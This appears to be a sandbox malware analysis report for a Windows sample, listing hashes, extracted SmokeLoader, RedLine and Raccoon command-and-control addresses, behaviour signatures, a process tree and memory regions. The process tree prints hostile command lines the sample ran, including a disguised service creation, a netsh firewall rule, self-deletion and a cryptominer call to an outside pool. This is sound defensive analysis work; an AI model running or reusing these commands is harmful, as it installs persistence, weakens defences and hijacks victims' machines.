Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    29-09-2021 16:22

General

  • Target

    7687054ef76c0842a827c7249c7c5454.exe

  • Size

    221KB

  • MD5

    7687054ef76c0842a827c7249c7c5454

  • SHA1

    da4177807371fa64acc17dfdd0fa0b6d6c39a8b7

  • SHA256

    f085d79b0b46ad9eda7f2191e2e668314553251ab5d0f4936f84cd2c1afa2564

  • SHA512

    2e32bfffb654c0372fc190f859152bd60136cbeb182a6f64f7f12ae46641f2b1fc498c87dd3513d015fcf9f6187ec6287cfe37660b42b474562137605452773a

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32
rc4.i32

Extracted

Family

redline

C2

92.246.89.6:38437

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

5k superstar

C2

narlelalik.xyz:12509

Extracted

Family

redline

Botnet

Spectrum

C2

190.2.145.73:16827

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe
    "C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe
      "C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1552
  • C:\Users\Admin\AppData\Local\Temp\2AD6.exe
    C:\Users\Admin\AppData\Local\Temp\2AD6.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Users\Admin\AppData\Local\Temp\2AD6.exe
      C:\Users\Admin\AppData\Local\Temp\2AD6.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1616
  • C:\Users\Admin\AppData\Local\Temp\3321.exe
    C:\Users\Admin\AppData\Local\Temp\3321.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Users\Admin\AppData\Local\Temp\3321.exe
      C:\Users\Admin\AppData\Local\Temp\3321.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:324
  • C:\Users\Admin\AppData\Local\Temp\51AA.exe
    C:\Users\Admin\AppData\Local\Temp\51AA.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Users\Admin\AppData\Roaming\51AA.exe
      "C:\Users\Admin\AppData\Roaming\51AA.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      PID:988
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
        3⤵
          PID:1728
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            4⤵
              PID:1852
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\51AA.exe
            3⤵
              PID:1672
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 0
                4⤵
                  PID:996
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Self.bat" "
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                3⤵
                  PID:2000
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del 51AA.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1792
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 0
                  3⤵
                    PID:1712
              • C:\Users\Admin\AppData\Local\Temp\63A5.exe
                C:\Users\Admin\AppData\Local\Temp\63A5.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1184
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sthlweom\
                  2⤵
                    PID:596
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oirborwi.exe" C:\Windows\SysWOW64\sthlweom\
                    2⤵
                      PID:568
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\System32\sc.exe" create sthlweom binPath= "C:\Windows\SysWOW64\sthlweom\oirborwi.exe /d\"C:\Users\Admin\AppData\Local\Temp\63A5.exe\"" type= own start= auto DisplayName= "wifi support"
                      2⤵
                        PID:1896
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" description sthlweom "wifi internet conection"
                        2⤵
                          PID:1176
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" start sthlweom
                          2⤵
                            PID:980
                          • C:\Windows\SysWOW64\netsh.exe
                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                            2⤵
                              PID:1640
                          • C:\Windows\SysWOW64\sthlweom\oirborwi.exe
                            C:\Windows\SysWOW64\sthlweom\oirborwi.exe /d"C:\Users\Admin\AppData\Local\Temp\63A5.exe"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:812
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              2⤵
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              PID:1824
                              • C:\Windows\SysWOW64\svchost.exe
                                svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                3⤵
                                  PID:1196
                            • C:\Users\Admin\AppData\Local\Temp\84EB.exe
                              C:\Users\Admin\AppData\Local\Temp\84EB.exe
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Enumerates connected drives
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1012
                              • C:\Windows\SysWOW64\msiexec.exe
                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\84EB.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632932347 " AI_EUIMSI=""
                                2⤵
                                • Blocklisted process makes network request
                                • Enumerates connected drives
                                • Suspicious use of FindShellTrayWindow
                                PID:592
                            • C:\Windows\system32\msiexec.exe
                              C:\Windows\system32\msiexec.exe /V
                              1⤵
                              • Blocklisted process makes network request
                              • Enumerates connected drives
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1924
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding 0EAD154EDF85CE3CC61C380CADD94D28 C
                                2⤵
                                • Loads dropped DLL
                                PID:1700
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding 24A524817DDBDFAFF85E5891818629C1
                                2⤵
                                • Loads dropped DLL
                                PID:808
                              • C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
                                "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops startup file
                                PID:1596
                            • C:\Users\Admin\AppData\Local\Temp\9428.exe
                              C:\Users\Admin\AppData\Local\Temp\9428.exe
                              1⤵
                              • Executes dropped EXE
                              PID:372
                            • C:\Users\Admin\AppData\Local\Temp\9BD7.exe
                              C:\Users\Admin\AppData\Local\Temp\9BD7.exe
                              1⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              PID:1228
                            • C:\Users\Admin\AppData\Local\Temp\A9CC.exe
                              C:\Users\Admin\AppData\Local\Temp\A9CC.exe
                              1⤵
                              • Executes dropped EXE
                              PID:2012

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/324-76-0x0000000000400000-0x0000000000422000-memory.dmp

                              Filesize

                              136KB

                            • memory/324-78-0x0000000000CD0000-0x0000000000CD1000-memory.dmp

                              Filesize

                              4KB

                            • memory/324-73-0x0000000000400000-0x0000000000422000-memory.dmp

                              Filesize

                              136KB

                            • memory/372-161-0x00000000004A0000-0x0000000000530000-memory.dmp

                              Filesize

                              576KB

                            • memory/372-162-0x0000000000400000-0x0000000000493000-memory.dmp

                              Filesize

                              588KB

                            • memory/656-87-0x0000000004A60000-0x0000000004A61000-memory.dmp

                              Filesize

                              4KB

                            • memory/656-86-0x0000000000270000-0x0000000000271000-memory.dmp

                              Filesize

                              4KB

                            • memory/656-85-0x00000000009E0000-0x0000000000A31000-memory.dmp

                              Filesize

                              324KB

                            • memory/656-83-0x00000000010A0000-0x00000000010A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/812-127-0x0000000000400000-0x0000000000448000-memory.dmp

                              Filesize

                              288KB

                            • memory/988-157-0x00000000007A0000-0x00000000007CA000-memory.dmp

                              Filesize

                              168KB

                            • memory/988-94-0x0000000000860000-0x0000000000861000-memory.dmp

                              Filesize

                              4KB

                            • memory/988-101-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1184-106-0x0000000000400000-0x0000000000448000-memory.dmp

                              Filesize

                              288KB

                            • memory/1184-105-0x00000000002B0000-0x00000000002C3000-memory.dmp

                              Filesize

                              76KB

                            • memory/1196-206-0x0000000000150000-0x0000000000241000-memory.dmp

                              Filesize

                              964KB

                            • memory/1228-195-0x0000000002102000-0x0000000002103000-memory.dmp

                              Filesize

                              4KB

                            • memory/1228-193-0x0000000002101000-0x0000000002102000-memory.dmp

                              Filesize

                              4KB

                            • memory/1228-188-0x00000000003A0000-0x00000000003BF000-memory.dmp

                              Filesize

                              124KB

                            • memory/1228-189-0x0000000001D80000-0x0000000001D9E000-memory.dmp

                              Filesize

                              120KB

                            • memory/1228-197-0x0000000002104000-0x0000000002106000-memory.dmp

                              Filesize

                              8KB

                            • memory/1228-196-0x0000000002103000-0x0000000002104000-memory.dmp

                              Filesize

                              4KB

                            • memory/1228-191-0x0000000000230000-0x0000000000260000-memory.dmp

                              Filesize

                              192KB

                            • memory/1228-192-0x0000000000400000-0x0000000000454000-memory.dmp

                              Filesize

                              336KB

                            • memory/1364-79-0x0000000003E60000-0x0000000003E75000-memory.dmp

                              Filesize

                              84KB

                            • memory/1364-212-0x000007FEF5A40000-0x000007FEF5B83000-memory.dmp

                              Filesize

                              1.3MB

                            • memory/1364-57-0x0000000002A90000-0x0000000002AA5000-memory.dmp

                              Filesize

                              84KB

                            • memory/1364-213-0x000007FE91BF0000-0x000007FE91BFA000-memory.dmp

                              Filesize

                              40KB

                            • memory/1552-53-0x0000000000400000-0x0000000000409000-memory.dmp

                              Filesize

                              36KB

                            • memory/1552-55-0x0000000076B61000-0x0000000076B63000-memory.dmp

                              Filesize

                              8KB

                            • memory/1756-56-0x0000000000220000-0x0000000000229000-memory.dmp

                              Filesize

                              36KB

                            • memory/1824-124-0x0000000000080000-0x0000000000095000-memory.dmp

                              Filesize

                              84KB

                            • memory/1828-63-0x0000000001160000-0x0000000001161000-memory.dmp

                              Filesize

                              4KB

                            • memory/1828-71-0x0000000004720000-0x0000000004721000-memory.dmp

                              Filesize

                              4KB

                            • memory/1924-128-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmp

                              Filesize

                              8KB

                            • memory/2012-200-0x00000000004A0000-0x00000000004BF000-memory.dmp

                              Filesize

                              124KB

                            • memory/2012-205-0x00000000049E3000-0x00000000049E4000-memory.dmp

                              Filesize

                              4KB

                            • memory/2012-204-0x00000000049E2000-0x00000000049E3000-memory.dmp

                              Filesize

                              4KB

                            • memory/2012-203-0x00000000049E4000-0x00000000049E6000-memory.dmp

                              Filesize

                              8KB

                            • memory/2012-202-0x00000000049E1000-0x00000000049E2000-memory.dmp

                              Filesize

                              4KB

                            • memory/2012-201-0x0000000001E10000-0x0000000001E2E000-memory.dmp

                              Filesize

                              120KB

                            • memory/2012-199-0x0000000000400000-0x000000000045D000-memory.dmp

                              Filesize

                              372KB

                            • memory/2012-198-0x00000000002E0000-0x0000000000310000-memory.dmp

                              Filesize

                              192KB